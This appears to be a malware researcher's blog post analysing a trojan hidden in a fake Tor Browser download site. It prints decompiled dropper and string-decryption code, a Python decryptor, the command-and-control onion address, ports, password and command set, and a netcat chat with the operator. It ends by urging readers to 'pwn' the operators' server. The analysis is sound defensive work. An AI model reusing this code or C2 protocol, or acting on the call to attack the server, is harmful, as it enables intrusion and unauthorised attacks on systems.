Title: Torbundlebrowser.org Date: 2014-08-13 02:30 A couple of hours ago, a [friend of mine]( http://florent.daigniere.com/ ) told me: > < nextgens> jvoisin> if you want some malware to look into: torbundlebrowser.org The website is an almost perfect copy of the [original website]( https://torproject.org), except for the download link, and also the donation one, replaced by a [bitcoin address](https://blockchain.info/address/12m7ahUqVaucu6ciJyLmVfTLzKGvC13SMa). ## Fake one ![fake]( {static}/images/tor_fake.png ) ## Original one ![original]( {static}/images/tor_real.png ) # First binary I downloaded the [alleged Tor Browser Bundle]( {static}/files/b7e516a33956cc60703cd0057d8d8874.zip) (password: infected), named "torbrowser-install-3.6.3_en-US.exe", and PEiD/[yara]( http://radare.today/yara-support/ ) told me that it's a .NET executable. [ILSpy]( http://ilspy.net/ ) shows us: ```csharp // Entry point: eval_b.a // Architecture: x86 // Runtime: .NET 2.0 using System; using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.InteropServices; [assembly: AssemblyVersion("3.6.3.0")] [assembly: Dotfuscator("retail:1:1:4.9.5000.15987", 1, true)] [assembly: AssemblyCompany("Tor Project")] [assembly: AssemblyConfiguration("")] [assembly: AssemblyCopyright("Copyright © 2014")] [assembly: AssemblyDescription("Tor Browser")] [assembly: AssemblyFileVersion("3.6.3.0")] [assembly: AssemblyProduct("Tor Browser 3.6.3")] [assembly: AssemblyTitle("Tor Browser Obfuscated with Dotfuscator Professional Evaluation. Illegal to use on software for general release.")] [assembly: AssemblyTrademark("")] [assembly: CompilationRelaxations(8)] [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)] [assembly: ComVisible(false)] [assembly: Guid("00000000-0000-0000-0000-000000000000")] ``` Just drop the binary on the latest version of [de4dot]( https://github.com/0xd4d/de4dot ) to get an unpacked version. There is an interesting resource named "TorProject.vid.mkv", which seems to be some data with high entropy: likely a packed/crypted payload. The sample has a few methods; here is the (only) interesting one: ```csharp // eval_a public static void eval_a(string string_0, string string_1, string string_2) { try { using (RijndaelManaged rijndaelManaged = new RijndaelManaged()) { byte[] bytes = Encoding.UTF8.GetBytes(string_2); byte[] bytes2 = Encoding.UTF8.GetBytes(string_2); using (FileStream fileStream = new FileStream(string_0, FileMode.Open)) { using (FileStream fileStream2 = new FileStream(string_1, FileMode.Create)) { using (ICryptoTransform cryptoTransform = rijndaelManaged.CreateDecryptor(bytes, bytes2)) { using (CryptoStream cryptoStream = new CryptoStream(fileStream, cryptoTransform, CryptoStreamMode.Read)) { int num; while ((num = cryptoStream.ReadByte()) != -1) fileStream2.WriteByte((byte)num); } } } } } } catch (Exception) {} } ``` It's called with the following parameters: 1. vid.mkv 2. Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Windows\\" + "\\windll32.exe" 3. VisualStudio2010 So, to sum up, the next payload is encrypted with Rijndael, must be decrypted with the key "VisualStudio2010", and the result will be written to *%AppData%\Windows\windll32.exe* Since I'm super lazy, I used a [build of ILSpy]( http://community.sharpdevelop.net/blogs/marcueusebiu/archive/2011/04/12/ilspy-debugger-preview.aspx ) with an integrated debugger, set a breakpoint after the decryption, and got the second binary. # Second binary I was quite amused by the some method names, since the binary may look like a game at first sight: ```csharp public static void CastNetToWinGame(string filename) // Make a screenshot public static string MakeSenseofItAll(string Message, string Passphrase) // Decryption routine public static string TallyUpScoresNewGame() // Network-interface-related crap public static string NiceShot() // Check the serial number of Win32_Physicalmedia public static string HighScores(string Message, string Passphrase) // Decryption routine public static string E3nCodeIt(string filename) // Base64 encoding of files public static void StartANewGame(string ProcessFilename, string args) // Start a new process public static void ClearScores(string filename) // Delete a file public static bool VirtualReality() // Check if the malware is in a virtual machine (VMWare/VirtualBox/VirtualPC) public static void RegisterYourGame(string path) // Add a key in the register for autostart/persistence public static void MakeitNew(string upgfile) // Download, Update/replace, run a new binary public static string Levelup() // Get information about hard drive public void StartGame() // Setup the communication canal to the CC public void RoundTwo() // Communication protocol with the CC private void RecurringScores(string dirPath, string uploadPath) // Upload files recursively private void ShotThroughTheHeart() // Try to take and upload a screenshot private void FinalBossinGame(string filename) // Execute a custom command private static void RollCredits() // Deploy the embeded Tor binary ... ``` Some commands are run by the mean of "cmd.exe", and are prefixed with `ping localhost -n 10 &`, likely to ensure that those commands are not run inside a sandbox like [cuckoo](http://cuckoosandbox.org/). ### Decryption All around the code, there are call to so functions, with a base64 encoded string as first argument, and "video game hall of fame" as second. Here is the corresponding decryption function: ```csharp public static string MakeSenseofItAll(string Message, string Passphrase) { UTF8Encoding uTF8Encoding = new UTF8Encoding(); MD5CryptoServiceProvider mD5CryptoServiceProvider = new MD5CryptoServiceProvider(); byte[] key = mD5CryptoServiceProvider.ComputeHash(uTF8Encoding.GetBytes(Passphrase)); TripleDESCryptoServiceProvider tripleDESCryptoServiceProvider = new TripleDESCryptoServiceProvider(); tripleDESCryptoServiceProvider.Key = key; tripleDESCryptoServiceProvider.Mode = CipherMode.ECB; tripleDESCryptoServiceProvider.Padding = PaddingMode.PKCS7; byte[] array = Convert.FromBase64String(Message); byte[] bytes; try { ICryptoTransform cryptoTransform = tripleDESCryptoServiceProvider.CreateDecryptor(); bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length); } finally { tripleDESCryptoServiceProvider.Clear(); mD5CryptoServiceProvider.Clear(); } return uTF8Encoding.GetString(bytes); } ``` I wrote a quick'n'dirty decryptor in Python: ```python from Crypto.Cipher import DES3 import hashlib from base64 import b64decode key = hashlib.md5("video game hall of fame").digest() cipher = DES3.new(key, DES3.MODE_ECB) ciphertexts = [ "M8aFUlePIs6oxgq7J5o/cw==", '/uc+pciIRHwPlS13nLgrHxfjFjzK5eq7', 'dsk6h/rjpLX3iTcm90vaMQ==', '/vAilHtgVYHl7LzMwlpm2Q==', 'A3K7Xxqob+deeXuXJoIDUyX22ZlF0Y31', 'oJTGIrUW7JfeVS7umpFv9Q==', 'EgMhlrqaGkH3iTcm90vaMQ==', 'dsk6h/rjpLX3iTcm90vaMQ==', 'M635gItlrs+0hltKwH36eippmvgBHvW1', 'QGANRB/9/IgDryaf2vg9qNlyF5mmOEktCmA1YfyPjoU=' ] for i in ciphertexts: print "%s : %s" % (i, cipher.decrypt(b64decode(i))) ``` This is the result: ``` M8aFUlePIs6oxgq7J5o/cw== : 127.0.0.1 /uc+pciIRHwPlS13nLgrHxfjFjzK5eq7 : silkroad6cebts64.onion dsk6h/rjpLX3iTcm90vaMQ== : MESSAGE| /vAilHtgVYHl7LzMwlpm2Q== : downloaded OK A3K7Xxqob+deeXuXJoIDUyX22ZlF0Y31 : Error downloading file EgMhlrqaGkH3iTcm90vaMQ== : CONNECT| dsk6h/rjpLX3iTcm90vaMQ== : MESSAGE| M635gItlrs+0hltKwH36eippmvgBHvW1 : Screenshot Captured: oJTGIrUW7JfeVS7umpFv9Q== : \videodrv.exe QGANRB/9/IgDryaf2vg9qNlyF5mmOEktCmA1YfyPjoU= : Error getting screenshot ``` ### Communication with the CC The communication protocol is quite simple, the only interesting thing is that it runs on Tor, on the hidden service silkroad6cebts64.onion:24576 This is the syntax to say to connect to the CC, and wait for commands: ``` CONNECT|v1.17117|117| ``` Where `v1.17` is the version number, and 117| is likely a release type identifier, since I found a "slim113" chain in another sample. Commands can be: - `Netcat`, to launch another connection - `putfile`, to download a file - `upgrade`, to upgrade the malware - `shot`, to get a screenshot - `updir`, to upload a directory recursively - `syscommand`, to execute a system command - `GetDrives`, to get drives (duh.) - `reboot`, to reboot (duh again) - `restart`, to restart the malware - `get`, to dowload a file - `getfile`, to upload a file There is also another port used, `24577`, with "Snake Video Game" as password, likely used for file transferts. I even had a chitchat with the botmaster: ``` amnesia@amnesia:~$ nc silkroad6cebts64.onion 24577 Snake Video Game . dir . Hello :) hi Nice job with this malware may i ask who this is I stumbled upon your website, and was curious oh nice. gj dissassembling. what did u use ? ILSpy I was curious about your payload cool. great work. reflector could have worked too :D Sure, but I prefer free sare you a malware researcher? I didn't get your question [REDACTED] oh, payload needs work as u can tell I'll be happy to take a look at it Ho, by the way, I'm also curioushow did you find the site btw? A friend of mine gave me the link heh nice, what are you using now, putty? netcat ah Cdo you write mal? You want me to send you an email? sure [REDACTED]@safe-mail.net I'm curious about how many bots do you have [...] ``` S·he told me that they are a small group (maybe from China) trying to catch pedophiles; by spreading the link to the fake website on pedo-boards, adding that one pedophile was already reported to [cybertip](https://www.cybertip.ca/). I'm not convinced, since the miscreant not only shipped a malware instead of the real TBB, but also replaced the donation page with his own BTC address. Their server is a stack of outdated crap, proudly powered by cPanel, feel free to pwn them for more details.